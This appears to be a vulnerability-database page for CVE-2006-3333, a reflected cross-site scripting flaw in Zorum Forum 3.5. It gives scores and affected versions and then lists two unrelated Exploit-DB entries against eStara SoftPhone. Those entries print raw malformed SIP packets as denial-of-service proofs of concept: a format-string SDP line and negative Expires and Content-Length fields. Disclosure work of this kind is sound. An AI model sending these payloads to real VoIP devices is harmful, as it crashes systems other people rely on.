CVE-2006-3333
Published 2006-06-30
Priority: P46 (low)
CVSS 2.0: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
EPSS: 0.82% (52.5th percentile)
Cross-site scripting (XSS) vulnerability in index.php in Zorum Forum 3.5 allows remote attackers to inject web script or HTML via the multiple unspecified parameters, including the (1) frommethod, (2) list, and (3) method, which are reflected in an error message. NOTE: some of these vectors might be resultant from SQL injection.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpoutsourcing | zorum | — | — |
No detection rules found.
Exploit-DB
exploitdb·2006-02-14
CVE-2006-0738 eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
```
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 ;tag=3013
To: zwell
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 ;tag=3013
To: zw
```
Exploit-DB
exploitdb·2006-02-14
CVE-2006-0737 eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
For the negative 'Expires' field issue:
```
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 ;tag=1793
To: zwell
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
```
For the 'Content-Length' field issue:
```
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 ;tag=2386
To: zwell
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: applicati
```
No writeups or analysis indexed.